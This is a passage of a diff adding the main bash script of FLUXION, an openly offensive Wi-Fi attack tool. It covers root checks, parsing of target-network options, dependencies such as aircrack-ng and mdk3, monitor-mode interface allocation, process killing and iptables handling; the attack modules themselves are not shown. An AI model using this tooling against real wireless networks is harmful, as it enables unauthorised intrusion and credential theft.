loaded afterward. +readonly FLUXIONLanguagePreferencesFile="$FLUXIONPath/preferences/LanguagePreference.conf" + +# Constants denoting the reference noise floor & ceiling levels. +# These are used by the the wireless network scanner visualizer. +readonly FLUXIONNoiseFloor=-90 +readonly FLUXIONNoiseCeiling=-60 + +readonly FLUXIONVersion=4 +readonly FLUXIONRevision=4 + +# Declare window ration bigger = smaller windows +FLUXIONWindowRatio=4 + +# ============================================================ # +# ================= < Script Sanity Checks > ================= # +# ============================================================ # +if [ $EUID -ne 0 ]; then # Super User Check + echo -e "Aborted, please execute the script as root."; exit 1 +fi + +# ===================== < XTerm Checks > ===================== # +# TODO: Run the checks below only if we're not using tmux. +if [ ! "${DISPLAY:-}" ]; then # Assure display is available. + echo -e "Aborted, X (graphical) session unavailable."; exit 2 +fi + +if ! hash xdpyinfo 2>/dev/null; then # Assure display probe. + echo -e "Aborted, xdpyinfo is unavailable."; exit 3 +fi + +if ! xdpyinfo &>/dev/null; then # Assure display info available. + echo -e "Aborted, xterm test session failed."; exit 3 +fi + +# ================ < Parameter Parser Check > ================ # +getopt --test > /dev/null # Assure enhanced getopt (returns 4). +if [ $? -ne 4 ]; then + echo "Aborted, enhanced getopt isn't available."; exit 4 +fi + +# =============== < Working Directory Check > ================ # +if ! mkdir -p "$FLUXIONWorkspacePath" &> /dev/null; then + echo "Aborted, can't generate a workspace directory."; exit 5 +fi + +# Once sanity check is passed, we can start to load everything. + + +# ============================================================ # +# =================== < Library Includes > =================== # +# ============================================================ # +source lib/installer/InstallerUtils.sh +source lib/InterfaceUtils.sh +source lib/SandboxUtils.sh +source lib/FormatUtils.sh +source lib/ColorUtils.sh +source lib/IOUtils.sh +source lib/HashUtils.sh +source lib/Help.sh + +# NOTE: These are configured after arguments are loaded (later). + +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if ! FLUXIONCLIArguments=$( + getopt --options="vdkrnmtbh:e:c:l:a:h:r" \ + --longoptions="debug,version,killer,reloader,ratio,help,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ + --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 +fi + +AttackCLIArguments=${FLUXIONCLIArguments##*--} +readonly FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} + + +# ============================================================ # +# ================== < Load Configurables > ================== # +# ============================================================ # + +# ============= < Argument Loaded Configurables > ============ # +eval set -- "$FLUXIONCLIArguments" # Set environment parameters. + +[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; + -h|--help) fluxion_help; exit;; + -d|--debug) readonly FLUXIONDebug=1;; + -k|--killer) readonly FLUXIONWIKillProcesses=1;; + -r|--reloader) readonly FLUXIONWIReloadDriver=1;; + -n|--airmon-ng) readonly FLUXIONAirmonNG=1;; + -m|--multiplexer) readonly FLUXIONTMux=1;; + -b|--bssid) FluxionTargetMAC=$2; shift;; + --ratio) FLUXIONWindowRatio=$2;shift;; + -e|--essid) FluxionTargetSSID=$2; + FluxionTargetSSIDClean=$( + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + shift;; + -c|--channel) FluxionTargetChannel=$2; shift;; + -l|--language) FluxionLanguage=$2; shift;; + -a|--attack) FluxionAttack=$2; shift;; + esac + shift # Shift new parameters +done + +shift # Remove "--" to prepare for attacks to read parameters. +# Executable arguments are handled after subroutine definition. + +# =================== < User Preferences > =================== # +# Load user-defined preferences if there's an executable script. +# If no script exists, prepare one for the user to store config. +# WARNING: Preferences file must assure no redeclared constants. +if [ -x "$FLUXIONLanguagePreferencesFile" ]; then + source "$FLUXIONLanguagePreferencesFile" +else + echo '#!/bin/bash' > "$FLUXIONLanguagePreferencesFile" + chmod u+x "$FLUXIONLanguagePreferencesFile" +fi + +# ================ < Configurable Constants > ================ # +if [ "$FLUXIONAuto" != "1" ]; then # If defined, assure 1. + readonly FLUXIONAuto=${FLUXIONAuto:+1} +fi + +if [ "$FLUXIONDebug" != "1" ]; then # If defined, assure 1. + readonly FLUXIONDebug=${FLUXIONDebug:+1} +fi + +if [ "$FLUXIONAirmonNG" != "1" ]; then # If defined, assure 1. + readonly FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} +fi + +if [ "$FLUXIONWIKillProcesses" != "1" ]; then # If defined, assure 1. + readonly FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} +fi + +if [ "$FLUXIONWIReloadDriver" != "1" ]; then # If defined, assure 1. + readonly FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} +fi + +# FLUXIONDebug [Normal Mode "" / Developer Mode 1] +if [ $FLUXIONDebug ]; then + readonly FLUXIONOutputDevice="/dev/stdout" + readonly FLUXIONHoldXterm="-hold" +else + readonly FLUXIONOutputDevice="/dev/null" + readonly FLUXIONHoldXterm="" +fi + +# ================ < Configurable Variables > ================ # +readonly FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " +FLUXIONPrompt=$FLUXIONPromptDefault + +readonly FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr" +FLUXIONVLine=$FLUXIONVLineDefault + +# ================== < Library Parameters > ================== # +readonly InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" + +readonly SandboxWorkspacePath="$FLUXIONWorkspacePath" +readonly SandboxOutputDevice="$FLUXIONOutputDevice" + +readonly InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" +readonly InstallerUtilsOutputDevice="$FLUXIONOutputDevice" +readonly InstallerUtilsNoticeMark="$FLUXIONVLine" + +readonly PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" + +declare IOUtilsHeader="fluxion_header" +readonly IOUtilsQueryMark="$FLUXIONVLine" +readonly IOUtilsPrompt="$FLUXIONPrompt" + +readonly HashOutputDevice="$FLUXIONOutputDevice" + + +# ============================================================ # +# =================== < Default Language > =================== # +# ============================================================ # +# Set by default in case fluxion is aborted before setting one. +source "$FLUXIONPath/language/en.sh" + + +# ============================================================ # +# ================== < Startup & Shutdown > ================== # +# ============================================================ # +fluxion_startup() { + if [ "$FLUXIONDebug" ]; then return 1; fi + + # Make sure that we save the iptable files + iptables-save >"$FLUXIONIPTablesBackup" + local banner=() + + format_center_literals \ + " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" + banner+=("$FormatCenterLiterals") + format_center_literals \ + "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" + banner+=("$FormatCenterLiterals") + + clear + + if [ "$FLUXIONAuto" ]; then + echo -e "$CBlu" + else + echo -e "$CRed" + fi + + for line in "${banner[@]}"; do + echo "$line"; sleep 0.05 + done + + echo # Do not remove. + + sleep 0.1 + local -r fluxionRepository="https://github.com/FluxionNetwork/fluxion" + format_center_literals "${CGrn}Site: ${CRed}$fluxionRepository$CClr" + echo -e "$FormatCenterLiterals" + + sleep 0.1 + local -r versionInfo="${CSRed}FLUXION $FLUXIONVersion$CClr" + local -r revisionInfo="(rev. $CSBlu$FLUXIONRevision$CClr)" + local -r credits="by$CCyn FluxionNetwork$CClr" + format_center_literals "$versionInfo $revisionInfo $credits" + echo -e "$FormatCenterLiterals" + + sleep 0.1 + local -r fluxionDomain="raw.githubusercontent.com" + local -r fluxionPath="FluxionNetwork/fluxion/master/fluxion.sh" + local -r updateDomain="github.com" + local -r updatePath="FluxionNetwork/fluxion/archive/master.zip" + if installer_utils_check_update "https://$fluxionDomain/$fluxionPath" \ + "FLUXIONVersion=" "FLUXIONRevision=" \ + $FLUXIONVersion $FLUXIONRevision; then + installer_utils_run_update "https://$updateDomain/$updatePath" \ + "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" \ + "$(dirname "$FLUXIONPath")" + fi + + echo # Do not remove. + + local requiredCLITools=( + "aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" + "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" + "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" + "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" + "fuser:psmisc" "killall:psmisc" + ) + + while ! installer_utils_check_dependencies requiredCLITools[@]; do + installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] + done + + echo -e "\n\n" # This echo is for spacing +} + +fluxion_shutdown() { + if [ $FLUXIONDebug ]; then return 1; fi + + # Show the header if the subroutine has already been loaded. + if type -t fluxion_header &> /dev/null; then + fluxion_header + fi + + echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" + + # Get running processes we might have to kill before exiting. + local processes + readarray processes < <(ps -A) + + # Currently, fluxion is only responsible for killing airodump-ng, since + # fluxion explicitly uses it to scan for candidate target access points. + # NOTICE: Processes started by subscripts, such as an attack script, + # MUST BE TERMINATED BY THAT SCRIPT in the subscript's abort handler. + local -r targets=("airodump-ng") + + local targetID # Program identifier/title + for targetID in "${targets[@]}"; do + # Get PIDs of all programs matching targetPID + local targetPID=$( + echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}' + ) + if [ ! "$targetPID" ]; then continue; fi + echo -e "$CWht[$CRed-$CWht] `io_dynamic_output $FLUXIONKillingProcessNotice`" + kill -s SIGKILL $targetPID &> $FLUXIONOutputDevice + done + + # Assure changes are reverted if installer was activated. + if [ "$PackageManagerCLT" ]; then + echo -e "$CWht[$CRed-$CWht] "$( + io_dynamic_output "$FLUXIONRestoringPackageManagerNotice" + )"$CClr" + unprep_package_manager + fi + + # If allocated interfaces exist, deallocate them now. + if [ ${#FluxionInterfaces[@]} -gt 0 ]; then + local interface + for interface in "${!FluxionInterfaces[@]}"; do + # Only deallocate fluxion or airmon-ng created interfaces. + if [[ "$interface" == "flux"* || "$interface" == *"mon"* ]]; then + fluxion_deallocate_interface $interface + fi + done + fi + + echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingCleaningIPTablesNotice$CClr" + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore <"$FLUXIONIPTablesBackup" \ + &> $FLUXIONOutputDevice + else + iptables --flush + iptables --table nat --flush + iptables --delete-chain + iptables --table nat --delete-chain + fi + + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" + tput cnorm + + if [ ! $FLUXIONDebug ]; then + echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr" + sandbox_remove_workfile "$FLUXIONWorkspacePath/*" + fi + + if [ $FLUXIONWIKillProcesses ]; then + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr" + + # TODO: Add support for other network managers (wpa_supplicant?). + if [ $(which systemctl) ]; then + if [ $(which service) ];then + service network-manager restart &> $FLUXIONOutputDevice & + service networkmanager restart &> $FLUXIONOutputDevice & + service networking restart &> $FLUXIONOutputDevice & + fi + else + systemctl restart network-manager.service &> $FLUXIONOutputDevice & + fi + fi + + echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr" + echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr" + + sleep 3 + + clear + + exit 0 +} + + +# ============================================================ # +# ================= < Handler Subroutines > ================== # +# ============================================================ # +# Delete log only in Normal Mode ! +fluxion_conditional_clear() { + # Clear iff we're not in debug mode + if [ ! $FLUXIONDebug ]; then clear; fi +} + +fluxion_conditional_bail() { + echo ${1:-"Something went wrong, whoops! (report this)"} + sleep 5 + if [ ! $FLUXIONDebug ]; then + fluxion_handle_exit + return 1 + fi + echo "Press any key to continue execution..." + read bullshit +} + +# ERROR Report only in Developer Mode +if [ $FLUXIONDebug ]; then + function fluxion_error_report() { + echo "Exception caught @ line #$1" + } + + trap 'fluxion_error_report $LINENO' ERR +fi + +fluxion_handle_abort_attack() { + if [ $(type -t stop_attack) ]; then + stop_attack &> $FLUXIONOutputDevice + unprep_attack &> $FLUXIONOutputDevice + else + echo "Attack undefined, can't stop anything..." > $FLUXIONOutputDevice + fi +} + +# In case of abort signal, abort any attacks currently running. +trap fluxion_handle_abort_attack SIGABRT + +fluxion_handle_exit() { + fluxion_handle_abort_attack + fluxion_shutdown + exit 1 +} + +# In case of unexpected termination, run fluxion_shutdown. +trap fluxion_handle_exit SIGINT SIGHUP + + +# ============================================================ # +# =============== < Resolution & Positioning > =============== # +# ============================================================ # +fluxion_set_resolution() { # Windows + Resolution + + # Get dimensions + SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") + SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) + SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) + + # Calculate proportional windows + PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) + NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) + + NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) + + SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) + SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) + + # Upper windows + TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" + TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" + TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" + + # Lower windows + BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" + BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" + BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" + + # Y mid + LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" + RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" + + # Big + TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" + TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" +} + + +# ============================================================ # +# ================= < Sequencing Framework > ================= # +# ============================================================ # +# The following lists some problems with the framework's design. +# The list below is a list of DESIGN FLAWS, not framework bugs. +# * Sequenced undo instructions' return value is being ignored. +# * A global is generated for every new namespace being used. +# * It uses eval too much, but it's bash, so that's not so bad. +# TODO: Try to fix this or come up with a better alternative. +declare -rA FLUXIONUndoable=( \ + ["set"]="unset" \ + ["prep"]="unprep" \ + ["run"]="halt" \ + ["start"]="stop" \ +) + +# Yes, I know, the identifiers are fucking ugly. If only we had +# some type of mangling with bash identifiers, that'd be great. +fluxion_do() { + if [ ${#@} -lt 2 ]; then return -1; fi + + local -r __fluxion_do__namespace=$1 + local -r __fluxion_do__identifier=$2 + + # Notice, the instruction will be adde to the Do Log + # regardless of whether it succeeded or failed to execute. + eval FXDLog_$__fluxion_do__namespace+=\("$__fluxion_do__identifier"\) + eval ${__fluxion_do__namespace}_$__fluxion_do__identifier "${@:3}" + return $? +} + +fluxion_undo() { + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_undo__namespace=$1 + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + eval local __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) + + eval echo \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice + + local __fluxion_undo__i + for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ + __fluxion_undo__i > 0; __fluxion_undo__i-- )); do + local __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} + local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} + local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} + + echo "Do ${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier" \ + > $FLUXIONOutputDevice + if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + echo "Undo-chain succeded." > $FLUXIONOutputDevice + eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) + eval echo History\: \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice + return 0 + fi + done + + return -2 # The undo-chain failed. +} + +fluxion_done() { + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_done__namespace=$1 + + eval "FluxionDone=\${FXDLog_$__fluxion_done__namespace[-1]}" + + if [ ! "$FluxionDone" ]; then return 1; fi +} + +fluxion_done_reset() { + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_done_reset__namespace=$1 + + eval FXDLog_$__fluxion_done_reset__namespace=\(\) +} + +fluxion_do_sequence() { + if [ ${#@} -ne 2 ]; then return -1; fi + + # TODO: Implement an alternative, better method of doing + # what this subroutine does, maybe using for-loop iteFLUXIONWindowRation. + # The for-loop implementation must support the subroutines + # defined above, including updating the namespace tracker. + + local -r __fluxion_do_sequence__namespace=$1 + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local __fluxion_do_sequence__sequence=("${!2}") + + if [ ${#__fluxion_do_sequence__sequence[@]} -eq 0 ]; then + return -2 + fi + + local -A __fluxion_do_sequence__index=() + + local i + for i in $(seq 0 $((${#__fluxion_do_sequence__sequence[@]} - 1))); do + __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i]}"]=$i + done + + # Start sequence with the first instruction available. + local __fluxion_do_sequence__instructionIndex=0 + local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} + while [ "$__fluxion_do_sequence__instruction" ]; do + if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then + if ! fluxion_undo $__fluxion_do_sequence__namespace; then + return -2 + fi + + # Synchronize the current instruction's index by checking last. + if ! fluxion_done $__fluxion_do_sequence__namespace; then + return -3; + fi + + __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} + + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then + return -4 + fi + else + let __fluxion_do_sequence__instructionIndex++ + fi + + __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[$__fluxion_do_sequence__instructionIndex]} + echo "Running next: $__fluxion_do_sequence__instruction" \ + > $FLUXIONOutputDevice + done +} + + +# ============================================================ # +# ================= < Load All Subroutines > ================= # +# ============================================================ # +fluxion_header() { + format_apply_autosize "[%*s]\n" + local verticalBorder=$FormatApplyAutosize + + format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n" + local headerTextFormat="$FormatApplyAutosize" + + fluxion_conditional_clear + + echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")" + printf "$CSRed$verticalBorder" "" + printf "$headerTextFormat" "" "" + printf "$CSBlu$verticalBorder" "" + echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr" + echo + echo +} + +# ======================= < Language > ======================= # +fluxion_unset_language() { + FluxionLanguage="" + + if [ "$FLUXIONLanguagePreferencesFile" ]; then + sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONLanguagePreferencesFile" + fi +} + +fluxion_set_language() { + if [ ! "$FluxionLanguage" ]; then + # Get all languages available. + local languageCodes + readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') + + local languages + readarray -t languages < <( + head -n 3 language/*.sh | + grep -E "^# native: " | + sed -E 's/# \w+: //' + ) + + io_query_format_fields "$FLUXIONVLine Select your language" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" \ + languageCodes[@] languages[@] + + FluxionLanguage=${IOQueryFormatFields[0]} + + echo # Do not remove. + fi + + # Check if all language files are present for the selected language. + find -type d -name language | while read language_dir; do + if [ ! -e "$language_dir/${FluxionLanguage}.sh" ]; then + echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" + echo -e "\t$language_dir/${FluxionLanguage}.sh" + return 1 + fi + done + + if [ $? -eq 1 ]; then # If a file is missing, fall back to english. + echo -e "\n\n$FLUXIONVLine Falling back to English..."; sleep 5 + FluxionLanguage="en" + fi + + source "$FLUXIONPath/language/$FluxionLanguage.sh" + + if [ "$FLUXIONLanguagePreferencesFile" ]; then + if more $FLUXIONLanguagePreferencesFile | \ + grep -q "FluxionLanguage=.\+" &> /dev/null; then + sed -r "s/FluxionLanguage=.+/FluxionLanguage=$FluxionLanguage/g" \ + -i.backup "$FLUXIONLanguagePreferencesFile" + else + echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONLanguagePreferencesFile" + fi + fi +} + +# ====================== < Interfaces > ====================== # +declare -A FluxionInterfaces=() # Global interfaces' registry. + +fluxion_deallocate_interface() { # Release interfaces + if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi + + local -r oldIdentifier=$1 + local -r newIdentifier=${FluxionInterfaces[$oldIdentifier]} + + # Assure the interface is in the allocation table. + if [ ! "$newIdentifier" ]; then return 2; fi + + local interfaceIdentifier=$newIdentifier + echo -e "$CWht[$CSRed-$CWht] "$( + io_dynamic_output "$FLUXIONDeallocatingInterfaceNotice" + )"$CClr" + + if interface_is_wireless $oldIdentifier; then + # Attempt deactivating monitor mode on the interface. + if ! interface_set_mode $oldIdentifier managed; then + return 3 + fi + fi + + # If interface was allocated by airmon-ng, deallocate with it. + if [[ "$oldIdentifier" == *"mon"* ]]; then + if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice; then + return 4 + fi + else + # Attempt to restore the original interface identifier. + if ! interface_reidentify $oldIdentifier $newIdentifier; then + return 5 + fi + fi + + # Once successfully renamed, remove from allocation table. + unset FluxionInterfaces[$oldIdentifier] + unset FluxionInterfaces[$newIdentifier] +} + +# Parameters: +# ------------------------------------------------------------ # +# Return 1: No interface identifier was passed. +# Return 2: Interface identifier given points to no interface. +# Return 3: Unable to determine interface's driver. +# Return 4: Fluxion failed to reidentify interface. +# Return 5: Interface allocation failed (identifier missing). +fluxion_allocate_interface() { # Reserve interfaces + if [ ! "$1" ]; then return 1; fi + + local -r identifier=$1 + + # If the interface is already in allocation table, we're done. + if [ "${FluxionInterfaces[$identifier]+x}" ]; then + return 0 + fi + + if ! interface_is_real $identifier; then return 2; fi + + + local interfaceIdentifier=$identifier + echo -e "$CWht[$CSGrn+$CWht] "$( + io_dynamic_output "$FLUXIONAllocatingInterfaceNotice" + )"$CClr" + + + if interface_is_wireless $identifier; then + # Unblock wireless interfaces to make them available. + echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" + rfkill unblock all &> $FLUXIONOutputDevice + + if [ "$FLUXIONWIReloadDriver" ]; then + # Get selected interface's driver details/info-descriptor. + echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" + + if ! interface_driver "$identifier"; then + echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" + sleep 3 + return 3 + fi + + # Notice: This local is function-scoped, not block-scoped. + local -r driver="$InterfaceDriver" + + # Unload the driver module from the kernel. + rmmod -f $driver &> $FLUXIONOutputDevice + + # Wait while interface becomes unavailable. + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONUnloadingWIDriverNotice + ) + while interface_physical "$identifier"; do + sleep 1 + done + fi + + if [ "$FLUXIONWIKillProcesses" ]; then + # Get list of potentially troublesome programs. + echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" + + # Kill potentially troublesome programs. + echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" + + # TODO: Make the loop below airmon-ng independent. + # Maybe replace it with a list of network-managers? + # WARNING: Version differences could break code below. + for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do + killall "$program" &> $FLUXIONOutputDevice + done + fi + + if [ "$FLUXIONWIReloadDriver" ]; then + # Reload the driver module into the kernel. + modprobe "$driver" &> $FLUXIONOutputDevice + + # Wait while interface becomes available. + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONLoadingWIDriverNotice + ) + while ! interface_physical "$identifier"; do + sleep 1 + done + fi + + # Set wireless flag to prevent having to re-query. + local -r allocatingWirelessInterface=1 + fi + + # If we're using the interface library, reidentify now. + # If usuing airmon-ng, let airmon-ng rename the interface. + if [ ! $FLUXIONAirmonNG ]; then + echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface" + + # Prevent interface-snatching by renaming the interface. + if [ $allocatingWirelessInterface ]; then + interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} + else + interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} + fi + + if [ $? -ne 0 ]; then # If reidentifying failed, abort immediately. + return 4 + fi + fi + + if [ $allocatingWirelessInterface ]; then + # Activate wireless interface monitor mode and save identifier. + echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" + + # TODO: Consider the airmon-ng flag is set, monitor mode is + # already enabled on the interface being allocated, and the + # interface identifier is something non-airmon-ng standard. + # The interface could already be in use by something else. + # Snatching or crashing interface issues could occur. + + # NOTICE: Conditionals below populate newIdentifier on success. + if [ $FLUXIONAirmonNG ]; then + local -r newIdentifier=$( + airmon-ng start $identifier | + grep "monitor .* enabled" | + grep -oP "wl.*mon|mon[0-9]+" + ) + else + # Attempt activating monitor mode on the interface. + if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor; then + # Register the new identifier upon consecutive successes. + local -r newIdentifier=fluxwl${#FluxionInterfaces[@]} + else + # If monitor-mode switch fails, undo rename and abort. + interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier + fi + fi + fi + + # On failure to allocate the interface, we've got to abort. + # Notice: If the interface was already in monitor mode and + # airmon-ng is activated, WE didn't allocate the interface. + if [ ! "$newIdentifier" -o "$newIdentifier" = "$oldIdentifier" ]; then + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocationFailedError" + sleep 3 + return 5 + fi + + # Register identifiers to allocation hash table. + FluxionInterfaces[$newIdentifier]=$identifier + FluxionInterfaces[$identifier]=$newIdentifier + + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocatedNotice" + sleep 3 + + # Notice: Interfaces are accessed with their original identifier + # as the key for the global FluxionInterfaces hash/map/dictionary. +} + +# Parameters: [] +# Note: The interfaces lambda must print an interface per line. +# ------------------------------------------------------------ # +# Return -1: Go back +# Return 1: Missing interfaces lambda identifier (not passed). +fluxion_get_interface() { + if ! type -t "$1" &> /dev/null; then return 1; fi + + if [ "$2" ]; then + local -r interfaceQuery="$2" + else + local -r interfaceQuery=$FLUXIONInterfaceQuery + fi + + while true; do + local candidateInterfaces + readarray -t candidateInterfaces < <($1) + local interfacesAvailable=() + local interfacesAvailableInfo=() + local interfacesAvailableColor=() + local interfacesAvailableState=() + + # Gather information from all available interfaces. + local candidateInterface + for candidateInterface in "${candidateInterfaces[@]}"; do + if [ ! "$candidateInterface" ]; then + local skipOption=1 + continue + fi + + interface_chipset "$candidateInterface" + interfacesAvailableInfo+=("$InterfaceChipset") + + # If it has already been allocated, we can use it at will. + local 